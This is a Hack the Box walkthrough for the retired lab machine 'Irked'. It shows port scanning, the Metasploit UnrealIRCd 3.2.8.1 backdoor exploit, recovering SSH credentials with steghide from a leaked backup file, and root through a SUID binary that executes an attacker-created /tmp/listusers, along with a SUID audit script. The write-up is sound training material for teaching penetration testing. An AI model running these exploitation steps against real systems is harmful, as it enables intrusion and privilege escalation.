Hack the Box – Irked Walkthrough

Today we’re going to solve another CTF machine, “Irked”. The box is now retired and is accessible to VIP members.
Specifications
- Target OS: Linux
- IP Address: 10.10.10.117
- Difficulty: Easy
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is reconnaissance, starting with a port scan.
Ports Scanning
During this step we identify what is listening behind the target IP address. A full TCP range is scanned so that the non-standard IRC ports are not missed.
nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117
22/tcp    open  ssh      OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA)
80/tcp    open  http     Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          53832/tcp  status
|_  100024  1          58245/udp  status
6697/tcp  open  irc      UnrealIRCd
8067/tcp  open  irc      UnrealIRCd
53832/tcp open  status   1 (RPC #100024)
65534/tcp open  irc      UnrealIRCd
Enumeration
Let’s browse URL http://10.10.10.117/
If we look at view-source:http://10.10.10.117/ we find nothing but an image, irked.jpg.
Steganography
Let’s wget irked.jpg and look for information hidden inside the image, first with a hex dump and a strings pass.
xxd irked.jpg
strings irked.jpg
Trying steghide prompts for a passphrase, and extraction fails without the right one, so if anything is embedded it is password protected.
steghide extract -sf irked.jpg
Let’s keep this aside for now and move ahead.
Exploitation
The nmap scan reveals UnrealIRCd, so let’s find out which version it is. Connecting with an IRC client such as HexChat shows the server’s greeting.
It reports UnrealIRCd version 3.2.8.1.
Let’s run searchsploit unrealircd and see whether an exploit exists for this version.
There are several; let’s try them.
Metasploit
Let’s fire up msfconsole and search for unreal. The matching module targets the 3.2.8.1 backdoor; point it at the target and the IRC port.
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
Now let’s run exploit and watch the magic.
We get a bare, non-interactive shell; let’s upgrade it to a proper TTY with python.
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
We find the user.txt flag in /home/djmardov/Documents but do not have permission to read it.
$ pwd
/home/djmardov/Documents
$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
$ wc -c user.txt
wc: user.txt: Permission denied
To read it we need a shell as djmardov. The .backup file in the same directory, however, is world-readable.
$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
It calls itself a “steg backup” password. The irked.jpg image we found earlier was passphrase-protected, so let’s rerun the steghide extraction with this password.
Steghide extracts a pass.txt file, which contains another password:
Kab6h+m+bbp2J:HG
Since SSH is open, this is most likely djmardov’s SSH password. Let’s try our luck.
ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
The login succeeds, and now we can read the user.txt flag.
Privilege Escalation
Two useful references for this phase:
- Linux Privilege Escalation via SUID Executables using Environment Paths
- Basic Linux Privilege Escalation
We can use enumeration scripts to spot anything odd, or simply enumerate by hand.
Let’s get started!
$ sudo -l
-bash: sudo: command not found
No sudo, so let’s look at which services and applications are running as root and whether anything stands out.
ps aux | grep root
ps -ef | grep root
Let’s find SUID files.
find / -perm -u=s -type f 2>/dev/null
OR
find / -maxdepth 6 -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null
(-maxdepth is a global option and belongs before the tests; placing it after -perm makes find print a warning.)
One file, /usr/bin/viewuser, stands out: no Debian package ships a binary by that name, and its modification time is recent. Running it shows what it does.
$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown)  :0           2019-04-28 22:35 (:0)
djmardov   pts/2        2019-05-04 05:58 (10.10.14.6)
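The manual steps above (list SUID binaries, pick the recently modified outlier, find out what it executes) as an added Python script, not from the original post: it walks the filesystem for setuid files, orders them newest first, and pulls out every absolute path under /tmp, /var/tmp or /dev/shm that appears in a binary’s string table, which is how a reference like /tmp/listusers inside /usr/bin/viewuser shows up without having to run the binary. The function names, the writable-directory list and the sample bytes are my own choices.

```python
import os
import re
import stat
import time

# Directories any local user can write to; a SUID binary that executes a path
# under one of these hands root to whoever creates that file first. (My list.)
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Absolute paths as they sit in a binary's string table (what `strings` would print).
ABS_PATH_RE = re.compile(rb"/[A-Za-z0-9_.][A-Za-z0-9_./-]*")


def find_suid(root="/"):
    """Walk `root` and return (path, owner uid, mtime) for each regular file with the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, st.st_mtime))
    return hits


def newest_first(hits):
    """Sort SUID hits by modification time, most recent first; the odd one out floats to the top."""
    return sorted(hits, key=lambda h: h[2], reverse=True)


def writable_paths_in(data: bytes):
    """Return the absolute paths embedded in `data` that live under a world-writable directory."""
    found = set()
    for m in ABS_PATH_RE.findall(data):
        p = m.decode("ascii", errors="ignore")
        if p.startswith(WRITABLE_DIRS):
            found.add(p)
    return sorted(found)


def audit_binary(path: str):
    """Read a binary and report any world-writable paths it references."""
    with open(path, "rb") as f:
        return writable_paths_in(f.read())


if __name__ == "__main__":
    for path, uid, mtime in newest_first(find_suid("/")):
        when = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        refs = audit_binary(path) if os.access(path, os.R_OK) else []
        flag = "  <-- references " + ", ".join(refs) if refs else ""
        print(f"{when}  uid={uid}  {path}{flag}")
```

A string match is a hint, not proof: the binary may only read the path, or may build it at runtime, so confirm by running it (as above) or by tracing it before relying on the hijack.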
The binary runs /tmp/listusers, and because viewuser is SUID root that command executes with root privileges. We create /tmp/listusers ourselves as an executable script that launches a shell; when we execute /usr/bin/viewuser again, it runs our /tmp/listusers and drops us into a root shell.
And we have the root flag.
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# wc -c /root/root.txt
33 /root/root.txt